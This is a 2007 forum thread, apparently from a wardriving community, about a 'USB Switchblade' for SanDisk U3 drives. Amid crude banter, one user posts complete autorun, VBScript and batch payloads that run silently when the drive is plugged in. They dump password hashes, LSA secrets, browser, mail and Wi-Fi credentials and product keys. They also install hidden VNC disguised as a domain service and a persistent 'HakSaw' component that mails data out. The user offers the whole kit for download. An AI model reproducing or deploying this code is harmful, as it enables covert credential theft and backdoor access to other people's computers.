SanDisk Cruzer Micro - Page 4

Barry · 07-06-2007

Quote:

Originally Posted by Mark57

Yeah, say no more, just post pics.

Do you really want me to post pictures of my hairy ass on the net? Cause I sure as hell know my cable modem doesn't!

Barry · 07-06-2007

How bout this.

Thorn · 07-06-2007

Quote:

Originally Posted by Barry

How bout this.

Hitm0ney hasn't been on in quite a while, but he did the wireless in her house.

I have to tell you, after all the hype about her topless shot in Swordfish, I was disappointed with the twins. I figured they'd be a lot perkier.

That reminds me. I am still waiting for a FBI/CIA-supported evil crime lord to whisk me off to an after-hours rave club so I can get fellated while breaking 128-bit encryption. After all, I've broken WEP, that so I shouldn't have to wait too long. It happens to other hackers, right? I saw it in the movies, so it must be true.

streaker69 · 07-06-2007

Quote:

Originally Posted by Thorn

Hitm0ney hasn't been on in quite a while, but he did the wireless in her house.

I have to tell you, after all the hype about her topless shot in Swordfish, I was disappointed with the twins. I figured they'd be a lot perkier.

That reminds me. I am still waiting for a FBI/CIA-supported evil crime lord to whisk me off to an after-hours rave club so I can get fellated while breaking 128-bit encryption. After all, I've broken WEP, that so I shouldn't have to wait too long. It happens to other hackers, right? I saw it in the movies, so it must be true.

It does happen, after all, that's the real reason Dutch didn't make it to Defcon last year.

Plus, I heard it happened to Waldo twice last week.

Thorn · 07-06-2007

Quote:

Originally Posted by streaker69

It does happen, after all, that's the real reason Dutch didn't make it to Defcon last year.

Yeah but wasn't he dragged off to the Blue Oyster Bar?

streaker69 · 07-06-2007

Quote:

Originally Posted by Thorn

Yeah but wasn't he dragged off to the Blue Oyster Bar?

Can you pick out which hottie fellated him?

Barry · 07-06-2007

Quote:

Originally Posted by Thorn

I have to tell you, after all the hype about her topless shot in Swordfish, I was disappointed with the twins. I figured they'd be a lot perkier.

At least they didn't look like Janet's.

Quote:

Originally Posted by Thorn

Yeah but wasn't he dragged off to the Blue Oyster Bar?

That would explain the heart thing.

beakmyn · 07-06-2007

If I was drunk I'd say that looks like Thorn and he was playing with his secret agent disguise kit.

beakmyn · 07-23-2007

In case anyone is still playing around with this. I've got a version for U3 that allows you to keep your existing U3/Launchpad functionality and still have a switchblade that doesn't run from launchpad autostart.

Pros:
Has built in immunity so you don't scan yourself.
Finds U3 CDrom and flash partition
stores logs on flash partition
All tools stored in CD-ROM partition (now overzealous antivirus can't delete them)

Cons:
Changes to switchblade script or tools requires use of Universal customizer to rebuild CDrom partition image (takes about 1 hour)

autorun.inf

Code:

[AutoRun] 
open=START.exe
icon=LaunchU3.exe,0 

[Definitions]
Launchpad=LaunchPad.exe
Vtype=2

[CopyFiles]
FileNumber=1
File1=LaunchPad.zip

[Update]
URL=

start.bat (compile to exe using exescript)

Code:

@rem ----- ExeScript Options Begin -----
@rem ScriptType: console,silent
@rem DestDirectory: current
@rem Icon: C:\Documents and Settings\dwk\Desktop\hacksaw\LAUNCHU3.EXE
@rem OutputFile: C:\Documents and Settings\dwk\Desktop\universal customizer\U3CUSTOM\START.exe
@rem ----- ExeScript Options End -----

@ECHO on

:: Thanks to Obi-Wahn
set MyComputers= Andreas_OBI-WAHN
:: It is IMPORTANT that Username and Hostname are as written as stored into the EnvVar
:: Change the combinations to your Settings. and then remove the Line below:
REM set MyComputers=%COMPUTERNAME%_%USERNAME%


set IgnoreMyComputers=Yes
:: This check is set here because it don't have to load all variables if it exits
Set Test=False
If %IgnoreMyComputers%==Yes (
	for %%i in (%MyComputers%) do (
		If %%i==%COMPUTERNAME%_%USERNAME% (
			set Test=True
		) 
	)
)


IF %Test%==True (		
	 LaunchU3.exe -a
	) ELSE (
		FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
			IF EXIST %%i:\System\SRC\drv.dat (
       			SET sd=%%i:\System\SRC
				)	
			)
LaunchU3.exe -a & \SRC\go.exe
)

:End
Exit

go.bat

Code:

@rem ----- ExeScript Options Begin -----
@rem ScriptType: console,silent
@rem DestDirectory: current
@rem Icon: none
@rem OutputFile: C:\Documents and Settings\dwk\Desktop\universal customizer\U3CUSTOM\SRC\GO.exe
@rem ----- ExeScript Options End -----
:: Props: Setzer1411, Marc, rpk5000, Gonzor

:: fd = flash partition (writable)
:: U3 = cdrom partition (readonly)
@ECHO off

CD ..\SRC >NUL

If %computername%.==. SET computername=computer
If %username%.==. SET username=None

:: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
	IF EXIST %%i:\NUL.EXT (
		IF EXIST %%i:\System\SRC\drv.dat (
		SET fd=%%i:\System
			)
        )
    IF EXIST %%i:\NUL.EXT (
		IF EXIST %%i:\SRC\go.exe (
		SET U3=%%i:\SRC
			)
		)
	)

:: SET LOG PATHS
	IF NOT EXIST %fd%\Logs\%computername% (
		MD %fd%\Logs\%computername%
		)
	DIR /a-d /s "%fd%\Logs\%computername%" | FIND /c ".log" > "%fd%\SRC\###"
	SET /p count=<"%fd%\SRC\###"
	IF %count%.==. Set count=0
	SET logdir=%fd%\Logs\%computername%
	SET log="%fd%\Logs\%computername%\%computername%-[%count%].log"
	SET tmplog="%fd%\Logs\%computername%\%computername%_TEMP.log"
	SET include=%fd%\SRC\Include
	SET /p eipurl=<"%fd%\SRC\Include\EIP.dat"
	DEL /f /q "%fd%\SRC\###"

:: PAYLOAD

Echo +-----------------------------------+  > %log% 2>&1
Echo ¦           System info             ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
  Echo Computer Name Is: %computername% And the Logged On User Name Is: %username% The date And Time Is: %date% %time% >> %log% 2>&1
  ipconfig /all >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦              Shares               ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1 
  net share >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦              Users                ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1 
  net user >> %log% 2>&1

Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦       [Network Services]          ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
   netstat.exe -abn >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦           [Port Scan]             ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
   .\portqry -local -l %tmplog% >> %log% 2>&1
   COPY %log% + %tmplog%* %log%  >> NUL
   DEL /f /q %tmplog% >NUL

Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦         Dump Product Keys         ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
Echo 
   .\produkey /nosavereg /stext %tmplog% /remote %computername% >> %log% 2>&1
   Copy %log% + %tmplog%* %log%  >> nul
   Del /f /q %tmplog% >nul
Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦          Dump IE7 Secrets         ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
   .\iepv.exe /stext %tmplog% >> %log% 2>&1
   Copy %log% + %tmplog%* %log%  >> nul
   Del /f /q %tmplog% >nul
Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦         Dump LSA Secrets          ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
   .\pspv.exe /stext %tmplog% >> %log% 2>&1
   Copy %log% + %tmplog%* %log%  >> nul
   Del /f /q %tmplog% >nul
Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦         Dump Network PW           ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
  .\netpass.exe /stext %tmplog% >> %log% 2>&1
   Copy %log% + %tmplog%* %log%  >> nul
   Del /f /q %tmplog% >nul

ECHO +-----------------------------------+ >> %log% 2>&1
ECHO ¦           [Dump Cache]            ¦ >> %log% 2>&1
ECHO +-----------------------------------+ >> %log% 2>&1
   .\cachedump.exe >> %log% 2>&1

Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦         FireFox Passwords         ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1

   .\FirePassword.exe >> %log% 2>&1

Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦         Dump Messenger PW         ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
   .\mspass.exe /stext %tmplog% >> %log% 2>&1
   Copy %log% + %tmplog%* %log%  >> nul
   Del /f /q %tmplog% >nul
Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦     Internet Explorer History     ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
   .\iehv.exe /stext %tmplog% >> %log% 2>&1
   Copy %log% + %tmplog%* %log%  >> nul
   Del /f /q %tmplog% >nul
Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦        Dump Wireless Key          ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
   .\wifike.exe /stext %tmplog% >> %log% 2>&1
   Copy %log% + %tmplog%* %log%  >> nul
   Del /f /q %tmplog% >nul
Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦         Dump URL History          ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
   cscript //nologo .\DUH.vbs >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦            Dump SAM               ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
  .\pwdump -o %tmplog% 127.0.0.1 >> %log% 2>&1
@echo on
   CD /d %logdir% 2>&1
   %\fgdump.exe -c >> %log% 2>&1
   ECHO.¦ >> %log% 2>&1
   ECHO -----Hashes-----¦ >> %log% 2>&1
   ECHO.¦ >> %log% 2>&1
   COPY %log% + %logdir%\127.0.0.1.pwdump  %log%  >> NUL
   DEL /f /q  %logdir%\127.0.0.1  >NUL
   CD /d %


ECHO +-----------------------------------+ >> %log% 2>&1
ECHO ¦           [External IP]           ¦ >> %log% 2>&1
ECHO +-----------------------------------+ >> %log% 2>&1
   .\wget.exe %eipurl% --output-document=%tmplog% 2>&1
   Copy %log% + %tmplog%* %log%  >> nul
   Del /f /q %tmplog% >nul

Echo +-----------------------------------+  >> %log% 2>&1
Echo ¦            Clipboard              ¦  >> %log% 2>&1
Echo +-----------------------------------+  >> %log% 2>&1
  .\nircmd.exe clipboard addfile %log%

:End
Exit

PM for the zipfile ~4MB and instructions on file layout

Why do you even need a switchblade?

Quote:

Originally Posted by Holiday In Express

Business Services

* Copying
* E-mail & Internet
* Facsimile
* PC available
* Printer
* Unstaffed Business Center

ccie4526 · 10-10-2007

Office Depot (Milwaukee) had the 2Gb U3 Cruzer Micro for $19.99 after instant discount today... picked one up for experimenting.

Quote:

Originally Posted by beakmyn

PM for the zipfile ~4MB and instructions on file layout

Not quite a PM, but...

beakmyn · 10-11-2007

Index of /~wardriver/switchblade

password is in the file

ccie4526 · 10-11-2007

Quote:

Originally Posted by beakmyn

Index of /~wardriver/switchblade

Thank you very much, let's see how bad I can screw up the install now.

beakmyn · 11-13-2007

UPDATE: Using Gonzor's (hak.5 forum) approach I've added my little parts and
Basically, you have in your Flash partition
System/src/Include/1-20.dat

Based on which dat files exist you can control what gets run. I.E. I don't
have 2.dat or 3.dat (hacksaw and vnc). This allows for a bit of customization iwithout having to re-compile the .ISO

FD = flash partition
U3 = CD partition

Code:

Root of CD partition

Quote:

Originally Posted by autorun.inf

[AutoRun]
open=wscript autorun.vbs
icon=LaunchU3.exe,0

[Definitions]
Launchpad=LaunchPad.exe

[CopyFiles]
FileNumber=1
File1=LaunchPad.zip

Quote:

Originally Posted by autorun.vbs

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
On Error Resume Next

strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)

For Each objDrive in colDrives
'ignore floppy drives - reserved by BIOS if they don't exist
If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then
If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\drv.dat") Then
strfd = objDrive.Driveletter & ":"
End If
If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\go.bat") Then
strU3 = objDrive.Driveletter & ":"
End If
End if
Next

If objFSO.FileExists(strfd & "\System\SRC\PL.dat") Then
objShell.Run strU3 & "\System\SRC\go.bat " & strfd & "," & strU3 & "," & strDate & "," & strTime, 0, False

End If

If objFSO.FileExists(strfd & "\System\SRC\U3.dat") Then
objShell.Run ".\LaunchU3.exe -a"

End If

Quote:

Originally Posted by U3\System\SRC\go.bat

:: Props: Setzer1411, Marc, rpk5000
:: fd = flash partition (writable)
:: U3 = cdrom partition (readonly)
@ECHO off

If %computername%.==. SET computername=computer
If %username%.==. SET username=None

SET fd=%1\System
SET U3=%2\System\SRC

CD %U3% >NUL

:: SET LOG PATHS
IF NOT EXIST %fd%\Logs\%computername% (
MD %fd%\Logs\%computername%
)

SET logdir=%fd%\Logs\%computername%
SET log="%fd%\Logs\%computername%\%computername%-[%3-%4].log"
SET tmplog="%fd%\Logs\%computername%\%computername%_TE MP.log"
SET include="%fd%\SRC\Include
SET /p eipurl=<"%1\System\SRC\Include\EIP.dat"
SET /p winaud=<"%1\System\SRC\Include\winaud.dat"
:: PAYLOAD
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1

IF EXIST %include%\0.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [System info] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
IPCONFIG /all >> %log% 2>&1

Echo +-----------------------------------+ >> %log% 2>&1
Echo + Shares + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
net share >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo + Users + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
net user >> %log% 2>&1
)

IF EXIST %include%\1.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [External IP] +>> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO External IP dumped >> %log% 2>&1
.\wget.exe %eipurl% --output-document=%tmplog% 2>&1
ECHO. >> %tmplog% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\2.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [VNC] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO VNC was installed silently >> %log% 2>&1
XCOPY ".\vnc\*.*" "%systemroot%" /c /y
SC create WinVNC binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" 2>&1
SC description WinVNC "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." 2>&1
REGEDIT /s .\vnc.reg 2>&1
NET START WinVNC 2>&1
)

IF EXIST %include%\3.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [HakSaw] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO HakSaw was installed silently >> %log% 2>&1
MD "%systemroot%\$NtUninstallKB931337$" || MD "%appdata%\sbs" 2>&1
XCOPY .\HS\*.* "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY .\HS\*.* "%appdata%\sbs" /y 2>&1
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.lnk" /f || "%appdata%\sbs\shortcut.exe" /f:"%allusersprofile%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" 2>&1
COPY ".\send.bat"+%include%\HS.dat" "%systemroot%\$NtUninstallKB931337$\send.bat" || COPY ".\send.bat"+%include%\HS.dat" "%appdata%\sbs\send.bat" 2>&1
COPY %include%\HS2.dat" "%systemroot%\$NtUninstallKB931337$\stunnel.co nf" || COPY %include%\HS2.dat" "%appdata%\sbs\stunnel.conf" 2>&1
ATTRIB "%systemroot%\$NtUninstallKB931337$" +s +h & ATTRIB "%appdata%\sbs" +s +h 2>&1
.\SBS.lnk & .\SBS2.lnk
)

IF EXIST %include%\4.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Wifi Hex] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\wifike.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog% %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\5.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM PWDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\pwdump 127.0.0.1 >> %log% 2>&1
)

IF EXIST %include%\6.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
CD /d %logdir% 2>&1
%U3%\fgdump.exe -c >> %log% 2>&1
ECHO. >> %log% 2>&1
ECHO -----Hashes----- >> %log% 2>&1
ECHO. >> %log% 2>&1
COPY %log%+%logdir%\127.0.0.1.pwdump %log% >> NUL
DEL /f /q %logdir%\127.0.0.1* >NUL
CD /d %U3%
)

IF EXIST %include%\7.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Network PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\netpass.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\8.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Mail PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\mailpv.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\9.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Echo +----------------------------------+ >> %log% 2>&1
Echo + [Dump Firefox PW] + >> %log% 2>&1
Echo +----------------------------------+ >> %log% 2>&1
.\FirePassword.exe >> %log% 2>&1
)

IF EXIST %include%\10.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump IE PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\iepv.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\11.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump messenger PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\mspass.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\12.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Cache] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\cachedump.exe >> %log% 2>&1
)

IF EXIST %include%\13.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump LSA secrets] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\pspv.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\14.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Product Keys] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\produkey.exe /nosavereg /stext "%tmplog%" /remote %computername% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\15.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump URL History] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
CSCRIPT //nologo .\DUH.vbs >> %log% 2>&1
)

IF EXIST %include%\16.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Updates-List] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\wul.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\17.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Network Services] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
netstat.exe -abn >> %log% 2>&1
)

IF EXIST %include%\18.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Port Scan] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\portqry -local -l %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
ECHO. >> %log% 2>&1
)

IF EXIST %include%\19.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo + Clipboard + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\nircmd.exe clipboard addfile %log%
)

IF EXIST %include%\20.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo + Win Audit + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
ECHO WinAudit saved to %logdir% >> %log% 2>&1
.\WinAudit.exe %winaud% /f=%logdir%\WA_%computername%[%3-%4] /f=%logdir%\WA_%computername%[%3-%4].txt >> %log% 2>&1
ECHO. >> %log% 2>&1
)

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

:End
EXIT

For getting the external IP

Quote:

Originally Posted by FD/system/src/include/EIP.dat

Current IP Check

Quote:

Originally Posted by FD/system/src/include/winaud.dat

/r=oxutn /o=PDF /m=CA Security Scan

You'll need parmavex Winaudit if you want 20.dat to run
Read the help file for info on the /r switch.

Quote:

Originally Posted by FD\system\src\include\

0 - System Info , Shares, Users
1 - External IP
2 - VNC
3 - Haksaw
4 - WIFI Key
5 - SAM PWDUMP
6 - SAM FGDUMP
7 - Network Password
8 - Mail Password
9 - Firefox Password
10 - IE Password
11 - Messenger Password
12 - Cache
13 - LSA Secrets
14 - Product Keys
15 - IE URL History
16 - Windows Updates List
17 - Network Services
18 - Open Port Scan
19 - Clipboard
20 - Win Audit
EIP - External IP check URL
winaud - command line options
HS2 - Mail Server for Haksaw
HS - Mail Message, username, Password

streaker69 · 11-24-2007

It would seem as though someone has finally come up with a good idea to prevent switchblade access.

ThinkGeek :: USB Security Lock

They should sell an 'admin pack' of 100 or 500 locks.

Starpoint · 11-24-2007

Quote:

Originally Posted by streaker69

It would seem as though someone has finally come up with a good idea to prevent switchblade access.

ThinkGeek :: USB Security Lock

They should sell an 'admin pack' of 100 or 500 locks.

Um... I used to push GPO out with the USB set to level 1

Level 0 = OFF
Level 1 = Power, NO Data
Level 2 = Power and Data allowed

This way the sheeple could charge their cell phones etc no data.

However, I can see where this would be useful if some idiot tried to boot off the USB before the OS and policies take effect

07-06-2007	#47 (permalink)
Barry Managing the iTards. Join Date: Dec 2002 Location: Ohio Posts: 5,259	How bout this. __________________ Atheism is a non-prophet organization.

10-11-2007	#56 (permalink)
beakmyn root\.workspace\.garbage. Join Date: Aug 2003 Posts: 4,765	Index of /~wardriver/switchblade password is in the file __________________ It's not Intelligent Design, it's peer pressure. ┌──────────────────────────────┐ ╞ NS Icons Explained\|et hoc genus omne ╡ └──────────────────────────────┘

11-24-2007	#59 (permalink)
streaker69 Psychic Amish Stumbler Join Date: Jul 2004 Location: Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA Posts: 11,708	It would seem as though someone has finally come up with a good idea to prevent switchblade access. ThinkGeek :: USB Security Lock They should sell an 'admin pack' of 100 or 500 locks. __________________ "One of these days, I'm going to cut you to pieces." If you're offended by this post, please feel free to report it to one of the many helpful moderators of this forum. Thank you.